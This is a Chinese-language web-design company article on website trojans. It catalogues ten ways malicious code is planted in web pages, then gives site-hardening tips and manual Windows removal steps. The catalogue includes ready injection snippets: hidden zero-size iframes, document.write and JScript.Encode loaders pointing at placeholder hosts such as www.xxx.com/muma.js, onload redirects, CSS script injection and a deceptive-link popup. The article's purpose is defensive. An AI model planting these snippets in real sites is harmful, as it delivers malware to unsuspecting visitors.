木马病毒对于每天都在使用电脑的人来说并不陌生,它们以各种形态存在于网页中,或是图片或是代码。。。对于木马病毒的来源我们已无从找到了,所以想要木马病毒阻止和清除就要从其它方面入手了。润壤科技根据丰富的建站经验总结出了网站中木马病毒存在的十大形式,并对这些木马病毒的清除做了有效方法,希望可以对大家有所帮助。
木马病毒是一种“木马”程序,是目前网络中比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机。网站如果中了木马,轻则使数据丢失,重则使整个网站瘫痪,所以掌握检验木马的方法是很必要的。
一般情况下,一个完整珠木马程序包括两个部分:一部分为服务端和一部分为客户端。其中植入对方电脑的为服务端,用于远程操控别人电脑的为客户端。攻击者会利用客户端运行被植入服务端的电脑,从而达到操控的目的。当用户的电脑上运行了木马程序的服务端以后,会产生一个具有迷惑性的进程,暗中打开特定的端口,向客户端发送数据,甚至可以利用这些开放的端口进入用户的电脑。
网站木马病毒常见的十大存在形式
木马病毒的存在形式指的是它在网站中的外在表现形式,也是木马设计者开发的多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目的。
第一种:框架挂马
<iframe src=地址 width=0 height=0></iframe>
第二种:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
第三种:js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀。
第四种:body挂马
<body onload="window.location='地址';"></body>
第五种:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxxxxxxxxxxxxx"></iframe>'; (注意:此网址为虚拟,仅为说明木马情况)。
第六种:css中挂马
body {background-image:url('javascript:document.write("<scriptsrc=http://www.XXX.net/muma.js></script>")')}
第七种:AJA挂马
<SCRIPT language=javascript>window.open("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
第八种:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
第九种:伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
第十种:高级欺骗
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,
status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");}
</SCRIPT>
基于以上十中网站中木马病毒的伪装性和传播都非常的隐蔽,我们即然已经知道了木马病毒的存在形式,那么发现它们的藏身之种处就会变的容易一些,清除工作也会变的快速一些。清除木马的方法有很多,用户可以根据自身情况的需要掌几种有效的清除方法。电脑可能重病毒的表现有:电脑操作速度变慢甚至无法执行任何命令,原因不明的网络流量,频繁死机或浏览器崩溃等等。
木马病毒类型统计
网站木马防范的十大有效方法
一、在进行网站维护时,建议用户通过ftp来上传、维护网页,尽量不安装脚本语言的上传程序。
二、网站后台在对脚本上传程序进行调用一定要进行身份认证,并只允许信任的人使用上传程序,包括各种新闻发布、商城及论坛程序,只要可以上传文件的脚本都要进行身份认证。
三、网站后台脚本程序管理员的用户名和密码要有一定复杂性,不能过于简单,当然还要注意定期更换。
四、一定要到正规网站下载网站模版,下载完成后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。
五、要尽量保持我们使用的程序是最新版本。
六、不要在网页上加注后台管理程序登陆页面的链接。
七、为防止程序有未知漏洞,可以在维护后一定要删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。
八、要时常备份数据库等的重要文件。
九、日常要多维护网站,并注意空间中是否有来历不明的脚本文件,如果发现一定要及时做有效处理。
十、一旦发现被入侵,除非自己能识别出所有木马文件,否则就要要删除所有文件。重新上传文件前,所有脚本程序用户名和密码都要重新设置,并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。
相信通过以上的防范措施,我们的网站是相对安全了,但是决不能因此就疏忽大意,因为木马病毒不会通知我们它要来了。
附:接下来分科科技与大家分享一种清除木马病毒的有效操作方法。
第一步:当我们发现有“木马”存在时,最安全也是最有效的方法就是马上将计算机与网络断开,防止黑客通过网络对你进行攻击。
第二步:然后编辑win.ini文件,将[WINDOWS]下面,“run=“木马”程序”或“load=“木马”程序”更改为“run=”和“load=”;编辑system.ini文件,将[BOOT]下面的“shell=‘木马’文件”,更改为:“shell=explorer.exe”;在注册表中,用regedit对注册表进行编辑,先在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名,再在整个注册表中搜索并替换掉“木马”程序。
第三步:重新启动计算机,然后再到注册表中将所有“木马”文件的键值删除。
需注意的是:有的“木马”程序并不是直接将“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下的“木马”键值删除就行了,因为有的“木马”如:BladeRunner“木马”,如果你删除它,“木马”会立即自动加上,你需要的是记下“木马”的名字与目录,然后退回到MS-DOS下,找到此“木马”文件并删除掉。
>>关注之篇文的人还在在看:
js.html" target="_blank" data-id="159">手机网站建设如何充分利用网页设计三剑客?
网页设计对于图片的运用有哪些特殊要求?
快看!如何为动漫网站打造出酷炫的网页设计?
解析:利用合理配色突出网站页面设计风格的三大技巧
深度挖掘微信网站与手机网站的四大本质区别
TAG标签耗时:0.030631065368652 秒
